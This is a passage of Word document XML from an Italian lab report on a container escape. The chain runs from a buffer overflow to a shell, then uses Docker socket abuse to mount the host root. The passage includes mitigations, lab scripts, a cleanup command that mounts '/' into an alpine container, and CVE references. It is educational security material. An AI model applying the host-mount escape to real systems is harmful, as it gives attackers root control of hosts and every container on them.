          <w:p w14:paraId="154AC655" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Abuso del </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>socket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Docker per montare </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>la root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dell'host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A77189" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Confine di isolamento del container: da container a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w14:paraId="3B4EA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D35B57B" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4. Condizione finale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20801F07" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lettura e scrittura come root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sull'host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E33263C" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Controllo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>dell'host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di tutti i container del </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>daemon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="541E0569" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00E4632A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC27200" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Effetto di interrompere una tappa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C3036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Correzione della tappa 1: nessuna shell nel container; la catena si ferma anche col </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> montato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F242AA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Rimozione della </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfigurazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> della tappa 3: l'attaccante resta confinato nel container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F42C54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sulle tappe 2 e 4: impatto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sull'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ridotto o nullo anche col </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> montato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405571AD" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>La catena richiede tutte le tappe: spezzarne una qualsiasi la interrompe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F6C78D" w14:textId="49669EC9" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>12. Riproducibilit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E522D90" w14:textId="1210E1DB" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'ambiente </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> costruito interamente dai file inclusi, tramite script dedicati:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAAFC6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bash scripts/setup.sh     # pull alpine,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pianta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la flag host, build e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avvio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C261D31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bash scripts/demo.sh      # baseline + catena completa (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bof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-&gt; shell -&gt; escape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AA79B" w14:textId="77777777" w:rsidR="00E4632A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bash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scripts/cleanup.sh   # smonta, rimuove immagine e flag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host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E3CD819" w14:textId="100AC19E" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il README contiene i comandi manuali equivalenti per il Prompt dei comandi di Windows. Il laboratorio non interagisce con sistemi esterni, di produzione o di terzi: l'unico </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> coinvolto </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> il Docker Engine locale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B1B6A" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>13. Arresto e rimozione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69976D4C" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts/cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148FADC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[+] Running 3/3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCCC99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Container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bof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-escape-lab     Removed          0.6s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1DB08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Image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bof-escape-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lab:latest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Removed          0.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC8664" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EEF5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Network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environment_</w:t>
      </w:r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default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Removed</w:t>
      </w:r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0.2s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C84EA" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comandi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3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105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>equivalenti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293F600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docker compose -f environment\docker-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compose.yml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down --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rmi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local -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151348B" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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docker run --rm -v /:/host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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alpine:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "rm -f /host/host_flag_secret.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43598A78" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>14. Riferimenti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21EC7E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 xml:space="preserve">CVE-2019-5736 - container breakout in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. https://nvd.nist.gov/vuln/detail/CVE-2019-5736</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A81E0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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Openwall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - analisi CVE-2019-5736. https://www.openwall.com/lists/oss-security/2019/02/11/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD561FD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CWE-121 Stack-based Buffer Overflow. https://cwe.mitre.org/data/definitions/121.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D0B3C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CWE-787 Out-of-bounds Write. https://cwe.mitre.org/data/definitions/787.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19450565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lastRenderedPageBreak/>
        <w:t>CVE-2015-7547 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>glibc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getaddrinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). https://nvd.nist.gov/vuln/detail/CVE-2015-7547</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECAC44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CVE-2021-3156 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Baron </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Samedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>). https://nvd.nist.gov/vuln/detail/CVE-2021-3156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D996580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sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Docker - Docker daemon attack surface. https://docs.docker.com/engine/security/#docker-daemon-attack-surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D7AD34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Docker - Protect the Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. https://docs.docker.com/engine/security/protect-access/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C653B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 xml:space="preserve">Docker - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rootless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mode. https://docs.docker.com/engine/security/rootless/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15644AE6" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Engine API. https://docs.docker.com/engine/api/latest/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A1174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sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>CIS Docker Benchmark. https://www.cisecurity.org/benchmark/docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C55F4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NIST SP 800-190 Application Container Security Guide. https://csrc.nist.gov/publications/detail/sp/800-190/final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A17B4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OWASP Command Injection. https://owasp.org/www-community/attacks/Command_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C38B8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Linux namespaces. https://man7.org/linux/man-pages/man7/namespaces.7.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3868CD13" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux capabilities. https://man7.org/linux/man-pages/man7/capabilities.7.html</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E4632A" w:rsidRPr="00105C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91C17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36AAC48"/>
    <w:lvl w:ilvl="0" w:tplc="B4BC2CE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="33AA6D36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="447E18E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="49884EF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9E186A9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="89CCE104">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1CA6851E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3DF68F50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="783AD0AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="732504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32A"/>
    <w:rsid w:val="00105CE3"/>
    <w:rsid w:val="004012B5"/>
    <w:rsid w:val="008E6FD9"/>
    <w:rsid w:val="00DE106B"/>
    <w:rsid w:val="00E4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7EA2"/>
  <w15:docId w15:val="{FE5338BF-1E49-4875-9708-CBA62368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2381</Words>
  <Characters>13576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Luisa Mele</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-24T09:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-24T09:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>